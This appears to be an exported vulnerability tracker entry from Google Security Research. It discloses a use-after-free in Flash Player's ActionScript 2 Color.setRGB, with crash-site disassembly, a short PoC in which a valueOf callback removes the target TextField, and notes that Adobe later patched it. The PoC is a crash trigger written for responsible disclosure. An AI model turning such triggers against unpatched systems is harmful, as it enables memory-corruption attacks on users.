search

AN-Master / google-security-research

Automatically exported from code.google.com/p/google-security-research
0 stars 0 forks source link

Flash UAF with Color.setRGB in AS2 #367

Closed GoogleCodeExporter closed 8 years ago

GoogleCodeExporter commented 8 years ago 
[Deadline tracking for Chromium VRP bug 
https://code.google.com/p/chromium/issues/detail?id=484610]

Credit is to bilou, working with the Chromium Vulnerability Rewards Program.

---
VULNERABILITY DETAILS
When calling Color.setRGB in AS2 it is possible to free the target_mc object 
used in the Color constructor while a reference remains in the stack.

VERSION
Chrome Version: Chrome stable 42.0.2311.90 with Flash 17.0.0.169
Operating System: Win7 x64 SP1

REPRODUCTION CASE
The Color constructor needs a target_mc object like a MovieClip, a TextField 
etc. While calling Color.setRGB with a custom object, it is possible to execute 
arbitrary AS2 code that might delete the target_mc object leading to a UAF.
(These lines come from flashplayer17_sa.exe 17.0.0.169):

.text:004B82D0                 push    esi
.text:004B82D1                 mov     esi, [esp+4+arg_0]
.text:004B82D5                 push    edi
.text:004B82D6                 mov     edi, ecx
.text:004B82D8                 mov     ecx, [edi+94h]  ; edi points to freed 
memory
.text:004B82DE                 and     ecx, 0FFFFFFFEh
.text:004B82E1                 add     ecx, 3Ch
.text:004B82E4                 mov     eax, esi
.text:004B82E6                 call    sub_4B0724      ; crash below
...
.text:004B0724                 mov     edx, [ecx]      ; crash here ecx = 3ch 
(null pointer)
.text:004B0726                 cmp     edx, [eax]
.text:004B0728                 jnz     short loc_4B077E

Compile the poc with Flash CS5.5
***************************************************************************
Content of as2_color_uaf.fla:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)
var o = new Object()
o.valueOf = function () {
    tf.removeTextField()
    return 0x41414142
}

var c = new Color(tf)
c.setRGB(o)

---

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by cev...@google.com on 6 May 2015 at 1:04

Attachments:

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 6 May 2015 at 7:09

GoogleCodeExporter commented 8 years ago

Original comment by cev...@google.com on 5 Jul 2015 at 6:40

GoogleCodeExporter commented 8 years ago 
Fixed: https://helpx.adobe.com/security/products/flash-player/apsb15-16.html

Original comment by cev...@google.com on 9 Jul 2015 at 12:37

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 18 Aug 2015 at 7:23